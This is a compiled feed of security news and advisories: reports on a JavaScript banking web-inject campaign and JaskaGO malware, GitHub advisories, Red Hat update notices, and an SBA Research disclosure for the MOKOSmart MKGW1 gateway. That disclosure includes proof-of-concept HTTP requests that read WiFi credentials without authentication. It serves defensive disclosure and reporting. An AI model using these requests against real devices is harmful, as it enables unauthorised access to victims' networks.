A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world.
The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan.

A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world.

The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan.

IBM Security Trusteer said it detected the campaign in March 2023.

"Threat actors' intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users' credentials in order to then access and likely monetize their banking information," security researcher Tal Langus said.

Attack chains are characterized by the use of scripts loaded from the threat actor-controlled server ("jscdnpack\[.\]com"), specifically targeting a page structure that's common to several banks. It's suspected the malware is delivered to targets by some other means, e.g., via phishing emails or malvertising.

When the victim visits a bank website, the login page is altered to incorporate malicious JavaScript capable of harvesting the credentials and one-time passwords (OTPs). The script is obfuscated to conceal its true intent.

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

"This web injection doesn't target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks," Langus said.

"The script's behavior is highly dynamic, continuously querying both the command-and-control (C2) server and the current page structure and adjusting its flow based on the information obtained."

The response from the server determines its next course of action, allowing it to erase traces of the injections, and insert fraudulent user interface elements to accept OTPs to bypass security protections as well as introduce an error message saying online banking services will be unavailable for a time period of 12 hours.

IBM said it's an attempt to dissuade the victims from logging in to their accounts, providing the threat actors with a window of opportunity to seize control of the accounts and perform unauthorized actions.

While the exact origins of the malware are presently not known, the indicators of compromise (IoCs) suggest a possible connection to a known stealer and loader family known as DanaBot, which has been propagated via malicious ads on Google Search and has acted as acted an initial access vector for ransomware.

"This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state," Langus said.

The development comes as Sophos shed more light on a pig butchering scheme in which potential targets are lured into investing in a fake liquidity mining service, uncovering a broader set of scams that has netted the actors nearly $2.9 million worth of cryptocurrency this year as of November 15 from 90 victims.

"They appear to have been run by three separate threat activity groups using identical fraudulent decentralized finance ('DeFi') app sites, suggesting that they are part of or affiliated with a single \[Chinese\] organized crime ring," security researcher Sean Gallagher said.

According to data shared by Europol earlier this week, investment fraud and business e-mail compromise (BEC) fraud remain the most prolific online fraud schemes.

"A concerning threat around investment fraud is its use in combination with other fraud schemes against the same victims," the agency said.

"Investment fraud is sometimes linked to romance scams: criminals slowly build a relationship of trust with the victim and then convince them to invest their savings on fraudulent cryptocurrency trading platforms, leading to large financial losses."

On a related note, cybersecurity company Group-IB said it identified 1,539 phishing websites impersonating postal operators and delivery companies since the start of November 2023. They are suspected to be created for a single scam campaign.

In these attacks, users are sent SMS messages that mimic well-known postal services and are prompted to visit the counterfeit websites to enter their personal and payment details, citing urgent or failed deliveries.

The operation is also notable for incorporating various evasion methods to fly under the radar. This includes limiting access to the scam websites based on geographic locations, making sure that they work only on specific devices and operating systems, and shortening the duration for which they are live.

"The campaign affects postal brands in 53 countries," Group-IB said. "Most of the detected phishing pages target users in Germany (17.5%), Poland (13.7%), Spain (12.5%), U.K. (4.2%), Turkey (3.4%) and Singapore (3.1%)."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide

An issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component `/presets/ssr-auth-chain.js`.

**blinksocks has weak encryption algorithms**

Moderate severity GitHub Reviewed Published Dec 21, 2023 to the GitHub Advisory Database • Updated Dec 21, 2023

GHSA-pqj5-37xf-x5gc: blinksocks has weak encryption algorithms

An issue was discovered in the bsock component of bcoin-org bcoin that allows remote attackers to obtain sensitive information via weak hashing algorithms in the component `\vendor\faye-websocket.js`.

**bsock uses weak hashing algorithms**

Moderate severity GitHub Reviewed Published Dec 21, 2023 to the GitHub Advisory Database • Updated Dec 21, 2023

GHSA-jj93-39pf-7mcf: bsock uses weak hashing algorithms

By Waqas
Another day, another cross-platform hits unsuspecting users!
This is a post from HackRead.com Read the original post: New JaskaGO Malware Targets Mac and Windows for Crypto, Browser Data

A recently discovered cross-platform malware, appropriately named JaskaGO, has surfaced, targeting both macOS and Windows systems.

Cybersecurity researchers at AT&T Alien Labs have discovered a sophisticated malware strain called JaskaGO, crafted in the Go (**Golang**) programming language and equipped with the ability to maintain persistence in infected systems. It can exfiltrate valuable information, including browser credentials and cryptocurrency wallet details.

JaskaGO was detected in July 2023, targeting Mac users. Since then, the threat has evolved its capabilities and developed in both macOS and Windows versions, with a low detection rate, as evidenced by recent anti-virus engine samples.

According to AT&T Alien Labs’ report, JaskaGO is a deceptive tool that presents a fake error message claiming a missing file to mislead users into believing the malicious code failed to run.

Further, it uses file names resembling well-known applications, such as “Capcut\_Installer\_Intel\_M1.dmg” and “Anyconnect.exe,” suggesting a common strategy of malware deployment under the guise of legitimate software in pirated application web pages.

The malware first scans the system to determine if it is operating within a virtual machine (VM), obtaining general machine information, such as the number of processors, system up-time, available system memory, and MAC addresses. The presence of MAC addresses associated with well-known VM software, such as VMware or VirtualBox, is a key indicator.

If not detected, it starts collecting information and continuously queries its C2 server, awaiting instructions for various commands. These commands include creating persistence, stealer functionalities, pinging the command and control, executing shell commands, alert messages, retrieving the running process list, executing files on disk or in memory, writing to the clipboard, performing random tasks, downloading and executing additional payloads, initiating the process to exit (self), and initiating the process to exit and delete itself.

JaskaGO is equipped with extensive data exfiltration capabilities, and stores acquired data in a specially created folder, zipping and sending it to the attacker. It can be configured to target additional browsers, collecting browser information such as credentials, history, cookies, password encryption keys, profile files, and login information.

Persistence mechanisms are established through two methods: Service Creation in Windows and Execution as Root in macOS. In Windows, the malware creates a Windows Terminal profile by generating the file: UserName\\AppData\\Local\\Packages\\Microsoft. WindowsTerminal\_\*\\LocalState\\settings.json.”

On macOS, the malware employs a multi-step process to establish persistence within the system: Execution as Root, Disabling Gatekeeper, and Duplicating itself. To ensure persistence, the malware creates either LaunchDaemon or LaunchAgent based on successful root access to get automatically launched during system startup and further embed itself into the macOS environment.

JaskaGO is still being investigated; but serves as a warning to Mac users who may have felt unaffected by cyber threats, emphasizing the importance of constant vigilance regardless of the chosen operating system.

****_RELATED ARTICLES_****

1.  **BlueNoroff APT Targeting macOS with ObjCShellz Malware**
2.  **Lazarus Group uses KandyKorn macOS malware for crypto theft**
3.  **Cracked macOS Software Laced with New Trojan Proxy Malware**
4.  **New Malware Turns Windows and macOS Devices into Proxy Nodes**
5.  **Researchers Leverage ChatGPT to Expose Notorious macOS Malware**
6.  **Windows, Linux, macOS Users Targeted by Chinese Iron Tiger APT Group**

New JaskaGO Malware Targets Mac and Windows for Crypto, Browser Data

MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 or below do not provide an adequate session management for the administrative web interface. This allows adjacent attackers with access to the management network to read and modify the configuration of the device.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# MOKOSmart MKGW1 Gateway Improper Session Management #

Link: https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management

## Vulnerability Overview ##

MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 or below do  
not provide an adequate session management for the administrative web  
interface. This allows adjacent attackers with access to the management  
network to read and modify the configuration of the device.

* **Identifier**            : SBA-ADV-20220120-01  
* **Type of Vulnerability** : Improper Authentication  
* **Software/Product Name** : [MOKOSmart MKGW1 BLE Gateway](https://www.mokosmart.com/mokosmart-mkgw1-gateway-iot-cloud-platform/)  
* **Vendor**                : [MOKO TECHNOLOGY LTD](https://www.mokosmart.com/)  
* **Affected Versions**     : <= 1.1.1  
* **Fixed in Version**      : Not yet  
* **CVE ID**                : Pending  
* **CVSS Vector**           : CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  
* **CVSS Base Score**       : 8.0 (High)

## Vendor Description ##

> * MKGW1 Bluetooth gateway is mainly used for the MOKO Bluetooth products.  
> * It is convenient for users to get the data of the MOKO series Beacon,  
>   and advertising raw data of any Bluetooth device.  
> * It can upload the data to the server via MQTT (V3.1.1) or HTTP(S)  
>   protocol.  
> * MKGW1 was developed with MediaTek® MT7688AN relying on OpenWrt system  
>   and Nordic® nRF52 platform.  
> * MKGW1 can connect the standard MQTT Broker, Aws IOT, Azure IOT HUB,  
>   Aliyun IOT.

Source: <http://doc.mokotechnology.com/index.php?s=/page/108>

## Impact ##

By exploiting the documented vulnerability, an attacker can gain  
administrative access to the device. For example, this can be misused by  
altering the configuration of the device or by reading out the configured  
network credentials and therefore getting a foothold in the victim's network.

## Vulnerability Description ##

The gateway offers a web-based configuration interface that can be used to  
edit the configuration of the gateway. Username and password are requested  
to authenticate the administrator. After sending the correct credentials the  
device sets a global server-side state to "logged in" for 3600 seconds,  
rather than issuing a session ID. Now any device on the same network can  
access the configuration interface as administrator without any additional  
authentication and read and modify the configuration.

## Proof of Concept ##

Login with the admin credentials on the web interface from a legitimate  
client:

HTTP request:

```http  
POST /goform/login HTTP/1.1  
Host: 192.168.22.1  
Content-Type: application/json  
Content-Length: 39  
Origin: http://192.168.22.1  
Connection: close  
Referer: http://192.168.22.1/sign_in

{"username":"Admin","password":"[redacted]"}  
```

HTTP response:

```http  
HTTP/1.1 200 OK  
Content-type: application/json  
Pragma: no-cache  
Cache-Control: no-cache

{ "state": { "code": 2000, "msg": "ok" }, "data": { "activetime": "3600" } }  
```

The response shown above does not contain any session identifier.  
On another client that can reach the web interface, an attacker can read out  
the configuration without any authentication:

HTTP request:

```http  
GET /goform/get_wan HTTP/1.1  
Host: 192.168.22.1  
Connection: close  
```

HTTP response:

```http  
HTTP/1.1 200 OK  
Content-type: application/json

{ "state": { "code": 2000, "msg": "ok" }, "data": { "wanmode": "WIFI", "wanssid": "[redacted]", "wanencrypt": "[redacted]", "wanpassword": "[redacted]", "proto": "dhcp", "ipaddr": "", "netmask": "", "gateway": "", "firdns": "", "secdns": "" } }  
```

The above proof-of-concept shows that the MOKO gateway cannot distinguish  
between multiple sessions. Therefore, if a legitimate client is logged in,  
an attacker can read the configuration. Furthermore, an attacker can also  
modify the configuration by sending the appropriate `JSON` data to the  
respective `POST` endpoint. Changes to the network can trigger a reboot  
of the device.

## Recommended Countermeasures ##

We are not aware of a vendor fix yet. Please contact the vendor.

We recommend to implement a proper session management for the  
administrative web interface of the device.

## Timeline ##

* `2022-01-20`: identification of vulnerability in version 1.1.1  
* `2022-01-27`: initial vendor contact  
* `2022-03-02`: disclosed vulnerability to vendor contact but received no reply  
* `2023-12-11`: request CVE from MITRE  
* `2023-12-12`: public disclosure

## References ##

* [Moko Gateway Documentation](https://www.mokosmart.com/wp-content/uploads/2019/10/GS-gateway.pdf)

## Credits ##

* Jakob Hagl ([SBA Research](https://www.sba-research.org/))  
* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWB8iQACgkQ+7iGL1j3  
dbK0eg//atfWytZOUPJ3omp9Rjb9sMJwu1Z8LdEZZGsQdsmQXJLaKF3AUDnt2cBx  
CLPVDh32lFbszJiMrJrXjj5WxH8CUtNQFdj1WTN4Uv5MlaRRvipOz7/XTemqRwGP  
+nctTDZHLFCeli4ZD36tE4zKcP3vm+R4e7Zy5BIP74G2Dw2hmFreSt7CC5CqZT3K  
oPo1hMF9PD7WhjYK/lBaxeR+6FkiCm7p/thgyeShHMVygJJjmjF+k3GQ61NmoVXc  
IjwRs+WY8Y/X/SfPjM8tjW/gZFHdOv/r/Gcz1OJs2D2quqmiKuoOhS9b/F8LDHsf  
OnKTNBaWH2oTzmuh7zSan+kPYj42gjpp+aSSoWK7At78yFFvLilCcckwIpKagh4U  
b3W//s5BPKCXJ1a7yH3WYGjbDAOzGMq1g50X1ZDNQ7zdQbELobFSNLWsnPwfN64i  
ljq6tXTOYT+4Jg4hI5I+3vD4q7mf7O2CL4fk5pUHoKMy7P28sxa7wX2jH+02C07J  
PKkaU+V2v4Lvf3PQvGTeupo50bTZX0xYqdmjjr3G9SUD+jESMCHPGaXw/Zpau71U  
uKD9f9MbZ9v/XML3IsBvd22QkayL7eegvmweyLmchp/ppigp99IX3rA7EgGkauW7  
1W7YiybQOvo5xaCiMakIqHXZtFcWIEryT8FRMW5cyraExHGkPPk=  
=jrYM  
-----END PGP SIGNATURE-----

MOKOSmart MKGW1 Gateway Improper Session Management 

Red Hat Security Advisory 2023-7879-03 - An update for opensc is now available for Red Hat Enterprise Linux 9. Issues addressed include bypass and out of bounds read vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7879.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opensc security updateAdvisory ID:        RHSA-2023:7879-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7879Issue date:         2023-12-19Revision:           03CVE Names:          CVE-2023-4535====================================================================Summary: An update for opensc is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Potential PIN bypass when card tracks its own login state (CVE-2023-40660)* OpenSC: multiple memory issues with pkcs15-init (enrollment tool) (CVE-2023-40661)* OpenSC: out-of-bounds read in MyEID driver handling encryption using symmetric keys (CVE-2023-4535)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4535References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2240912https://bugzilla.redhat.com/show_bug.cgi?id=2240913https://bugzilla.redhat.com/show_bug.cgi?id=2240914

Red Hat Security Advisory 2023-7879-03

Red Hat Security Advisory 2023-7877-03 - An update for openssl is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7877.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: openssl security updateAdvisory ID:        RHSA-2023:7877-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7877Issue date:         2023-12-19Revision:           03CVE Names:          CVE-2023-3446====================================================================Summary: An update for openssl is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.Security Fix(es):* openssl: Excessive time spent checking DH keys and parameters (CVE-2023-3446)* OpenSSL: Excessive time spent checking DH q parameter value (CVE-2023-3817)* openssl: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow (CVE-2023-5678)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3446References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2224962https://bugzilla.redhat.com/show_bug.cgi?id=2227852https://bugzilla.redhat.com/show_bug.cgi?id=2248616

Red Hat Security Advisory 2023-7877-03

Red Hat Security Advisory 2023-7876-03 - An update for opensc is now available for Red Hat Enterprise Linux 8. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7876.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opensc security updateAdvisory ID:        RHSA-2023:7876-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7876Issue date:         2023-12-19Revision:           03CVE Names:          CVE-2023-40660====================================================================Summary: An update for opensc is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Potential PIN bypass when card tracks its own login state (CVE-2023-40660)* OpenSC: multiple memory issues with pkcs15-init (enrollment tool) (CVE-2023-40661)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-40660References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2240912https://bugzilla.redhat.com/show_bug.cgi?id=2240913

Red Hat Security Advisory 2023-7876-03

Red Hat Security Advisory 2023-7875-03 - An update for gstreamer1-plugins-bad-free is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7875.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: gstreamer1-plugins-bad-free security updateAdvisory ID:        RHSA-2023:7875-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7875Issue date:         2023-12-19Revision:           03CVE Names:          CVE-2023-44446====================================================================Summary: An update for gstreamer1-plugins-bad-free is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-bad-free package contains a collection of plug-ins for GStreamer.Security Fix(es):* gstreamer: MXF demuxer use-after-free vulnerability (CVE-2023-44446)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44446References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2250249

Red Hat Security Advisory 2023-7875-03

Red Hat Security Advisory 2023-7874-03 - An update for gstreamer1-plugins-bad-free is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7874.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: gstreamer1-plugins-bad-free security updateAdvisory ID:        RHSA-2023:7874-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7874Issue date:         2023-12-19Revision:           03CVE Names:          CVE-2023-44446====================================================================Summary: An update for gstreamer1-plugins-bad-free is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer1-plugins-bad-free package contains a collection of plug-ins for GStreamer.Security Fix(es):* gstreamer: MXF demuxer use-after-free vulnerability (CVE-2023-44446)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44446References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2250249

Tag

#js